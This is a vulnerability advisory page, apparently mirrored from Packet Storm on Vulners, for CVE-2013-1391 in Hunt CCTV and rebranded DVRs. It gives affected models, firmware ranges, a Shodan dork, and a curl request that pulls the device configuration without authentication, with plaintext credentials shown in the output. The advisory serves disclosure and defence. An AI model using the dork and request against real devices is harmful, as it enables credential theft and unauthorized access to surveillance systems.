Vulners
Lucene search
Hunt CCTV Credential Disclosure
šļøĀ 28 Jan 2013Ā 00:00:00Reported byĀ Alejandro RamosTypeĀ 
Ā packetstormšĀ packetstormsecurity.comšĀ 85Ā Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2013-1391 | 29 Jan 201300:00 | ā | circl |
 | Multiple Products DVR Configuration Disclosure (CVE-2013-1391) | 21 Oct 201300:00 | ā | checkpoint_advisories |
 | CVE-2013-1391 | 30 Oct 201920:36 | ā | cve |
 | CVE-2013-1391 | 30 Oct 201920:36 | ā | cvelist |
 | Hunt CCTV DVR.cfg Direct Request Information Disclosure | 6 Feb 201300:00 | ā | nessus |
 | Multiple DVR Manufacturers Configuration Disclosure | 30 Jan 201316:22 | ā | metasploit |
 | CVE-2013-1391 | 30 Oct 201921:15 | ā | nvd |
 | Multiple DVR Information Disclosure Vulnerability | 1 Feb 201300:00 | ā | openvas |
| Multiple DVR Manufacturers Configuration Disclosure | 1 Sep 202400:00 | ā | packetstorm |
 | Authentication flaw | 30 Oct 201921:15 | ā | prion |
10
`Hunt CCTV (and generics brands) Insufficient Authentication
January 17, 2013 - A. Ramos <aramosf @ gmail . com>
-- CVE ID:
CVE-2013-1391 [reserved]
-- Affected Vendors:
Hunt CCTV (http://www.huntcctv.com/)
** generic brands from Hunt **
Capture CCTV (http://www.capturecctv.ca/)
NoVus CCTV (http://www.novuscctv.com/)
Well-Vision Inc (http://well-vision.com/)
-- Affected Models:
DVR-04 / DVR-04CH (HuntCCTV)
DVR-04NC (HuntCCTV)
DVR-08 / DVR-08CH (HuntCCTV)
DVR-08NC (HuntCCTV)
DVR-16 / DVR-16CH (HuntCCTV)
CDR 0410VE (CaptureCCTV-HuntCCTV)
CDR 0820VDE (CaptureCCTV-HuntCCTV)
DR6-704A4H (HuntCCTV)
DR6-708A4H (HuntCCTV)
DR6-7316A4H (HuntCCTV)
DR6-7316A4HL (HuntCCTV)
HDR-04KD (unknown-HuntCCTV)
HDR-08KD (unknown-HuntCCTV)
HV-04RD PRO (Hachi-HuntCCTV)
HV-08RD PRO (Hachi-HuntCCTV)
NV-DVR1204 (NovusSec)
NV-DVR1208 (NovusSec)
NV-DVR1216 (NovusSec)
TW-DVR604 (Well Vision INC Solutions-HuntCCTV)
TW-DVR616 (Well Vision INC Solutions-HuntCCTV)
Shodan dork: Basic realm="DVR" server: httpd -mini
Shodan results: 46890
Vulnerable: >70%
-- Vulnerability Details:
You can get the entire backup config with simple GET. No authentication
required.
All information are in clear text: admin panel, ddns config, ppoe
credentials, misc.
Example:
[aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i
USER
* Trying x.x.x.x... connected
* Connected to x.x.x.x (x.x.x.x) port 80 (#0)
> GET /DVR.cfg HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/
3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2
> Host: x.x.x.x
> Accept: */*
>
< HTTP/1.0 200 Ok
< Server: httpd
< Date: Fri, 17 Jan 2013 05:47:02 GMT
< Cache-Control: no-cache
< Pragma: no-cache
< Expires: 0
< Connection: close
< Content-Type: application/octet-stream
<
USER1_USERNAME=iam
USER1_PASSWORD=sexy
Vulnerable firmware (127 different ones):
- 1.1.10 to 1.1.92
- 1.47 to 1.51
- 2.0.0 to 2.1.93
- 3.0.04 to 3.1.92
-- Disclosure Timeline:
2011-09-?? - Vulnerability discovered
2012-12-20 - Published in the book "Hacker Epico" (
http://www.hackerepico.com)
2013-01-15 - CVE Assigned
2013-01-20 - Vulnerability reported to vendor
2013-01-24 - Vulnerability reported to GDT (Spain)
2013-01-28 - Public disclosure:
http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html
--
Alejandro Ramos
www.securitybydefault.com
`
Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jan 2013 00:00Current
EPSS0.86369